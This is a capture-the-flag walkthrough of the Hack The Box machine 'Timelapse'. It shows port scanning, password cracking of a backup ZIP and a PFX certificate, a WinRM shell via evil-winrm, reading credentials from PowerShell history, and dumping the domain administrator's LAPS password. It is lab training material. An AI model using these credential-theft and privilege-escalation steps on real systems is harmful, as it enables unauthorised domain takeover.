Timelapse — Hackthebox Walkthrough
Foothold
Starting off with my nmap, there were couple of open ports.
nmap --open -sV -sC 10.10.11.152
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2022-06-06 15:27:56Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5986/tcp open ssl/http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: 2022-06-06T15:29:28+00:00; +7h59m59s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after: 2022-10-25T14:25:29
| MD5: e233 a199 4504 0859 013f b9c5 e4f6 91c3
| SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
| -----BEGIN CERTIFICATE-----
| MIIDCjCCAfKgAwIBAgIQLRY/feXALoZCPZtUeyiC4DANBgkqhkiG9w0BAQsFADAd
| MRswGQYDVQQDDBJkYzAxLnRpbWVsYXBzZS5odGIwHhcNMjExMDI1MTQwNTI5WhcN
| MjIxMDI1MTQyNTI5WjAdMRswGQYDVQQDDBJkYzAxLnRpbWVsYXBzZS5odGIwggEi
| MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJdoIQMYt47skzf17SI7M8jubO
| rD6sHg8yZw0YXKumOd5zofcSBPHfC1d/jtcHjGSsc5dQQ66qnlwdlOvifNW/KcaX
| LqNmzjhwL49UGUw0MAMPAyi1hcYP6LG0dkU84zNuoNMprMpzya3+aU1u7YpQ6Dui
| AzNKPa+6zJzPSMkg/TlUuSN4LjnSgIV6xKBc1qhVYDEyTUsHZUgkIYtN0+zvwpU5
| isiwyp9M4RYZbxe0xecW39hfTvec++94VYkH4uO+ITtpmZ5OVvWOCpqagznTSXTg
| FFuSYQTSjqYDwxPXHTK+/GAlq3uUWQYGdNeVMEZt+8EIEmyL4i4ToPkqjPF1AgMB
| AAGjRjBEMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAdBgNV
| HQ4EFgQUZ6PTTN1pEmDFD6YXfQ1tfTnXde0wDQYJKoZIhvcNAQELBQADggEBAL2Y
| /57FBUBLqUKZKp+P0vtbUAD0+J7bg4m/1tAHcN6Cf89KwRSkRLdq++RWaQk9CKIU
| 4g3M3stTWCnMf1CgXax+WeuTpzGmITLeVA6L8I2FaIgNdFVQGIG1nAn1UpYueR/H
| NTIVjMPA93XR1JLsW601WV6eUI/q7t6e52sAADECjsnG1p37NjNbmTwHabrUVjBK
| 6Luol+v2QtqP6nY4DRH+XSk6xDaxjfwd5qN7DvSpdoz09+2ffrFuQkxxs6Pp8bQE
| 5GJ+aSfE+xua2vpYyyGxO0Or1J2YA1CXMijise2tp+m9JBQ1wJ2suUS2wGv1Tvyh
| lrrndm32+d0YeP/wb8E=
|_-----END CERTIFICATE-----
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49673/tcp open msrpc syn-ack Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49696/tcp open msrpc syn-ack Microsoft Windows RPC
55183/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-time:
| date: 2022-06-06T15:28:51
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 40124/tcp): CLEAN (Timeout)
| Check 2 (port 32357/tcp): CLEAN (Timeout)
| Check 3 (port 25116/udp): CLEAN (Timeout)
| Check 4 (port 22941/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
I saw smb was open. So I listed the shares available using smbclient
smbclient -L 10.10.11.152
Shares share seemed interesting. So I connected to the share to list the files inside.
smbclient //10.10.11.152/Shares
There were 2 directories in the share as Dev and HelpDesk . Inside the Dev directory, there was a ZIP file.
I downloaded the ZIP file with get winrm_backup.zip Then tried to unzip the file. But it was asking for a password. Since I didn’t have any password, I though of cracking the password for it.
So I extracted the hash form the ZIP file using zip2john then I used hashcat to crack the it.
zip2john winrm_backup.zip > hash
hashcat -m 17200 hash rockyou.txt
I was able to retrieve the password as supremelegacy. Extracting the ZIP file, I got a PFX file. These files are used for password-less authentication. Since I have msrpc open and the ZIP file’s name being winrm_backup, I though of using this file and extracting the public and the private key which can be used to authenticate to winrm.
But when I tried to extract the keys, I was asked for a password. I tried the password I got from the ZIP file, but it didn’t work. Therefore, I had to crack the password of this one too.
For that I used a tool called crackpkcs12
crackpkcs12 legaccy.pfx -d /usr/share/wordlists/rockyou.txt -t 400
Using this I was able to retrieve the password as thuglegacy
Having this password, I extracted the private key and the public key out of this file to use with winrm. (REFER)
- Take the file you exported (e.g. legaccy.pfx) and copy it to a system where you have OpenSSL installed. Note: the *.pfx file is in PKCS#12 format and includes both the certificate and the private key.
- Run the following command to export the private key:
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
3. Run the following command to export the certificate:
openssl pkcs12 -in legacyy_dev_auth.pfx-nokeys -out cert.pem
4. Run the following command to remove the passphrase from the private key:
openssl rsa -in key.pem -out server.key
Having the private key ( server.key ) and the public key ( cert.pem ) now we can use evil-winrm to get a shell on the system as the legaccy user.
evil-winrm -c cert.pem -k server.key -i 10.10.11.152 -u legacyy -p '' -S
Root
Running winpeas, I found an interesting file.
Console history was saved in a file which we have access to. Reading the file, I was able to get the password for svc_deploy user account.
Tried to winrm into the system, but didn’t work. So I had to use the same method what was in the ConsoleHistory.txt file.
$p = ConvertTo-SecureString 'E3R$Q62¹²p7PLlC%KWaxuaV' -AsPlainText -Force$c = New-Object System.Management.Automation.PSCredential ('administrator', $p)invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
I was able to execute whoami as svc_deploy user. Looking at the groups which this is a part of, I saw he is in LAPS_Readers group.
net user svc_deploy
Users of the LAPS_Readers group can read LAPS passwords of users. So I dumped the password of the administrator user with this
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-AdComputer -Identity DC01 -Properties * | Select Name ,ms-Mcs-AdmPwd}
I was able to retrieve administrators password as w1Xk+;R63r395+!jM-+K!!+9 Then I repeated the exact same steps I used to execute commands as svc_deploy replacing the password with administrator’s password.
$p = ConvertTo-SecureString ‘w1Xk+;R63r395+!jM-+K!!+9’ -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('administrator', $p)invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
I was able to execute whoami as administrator
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄
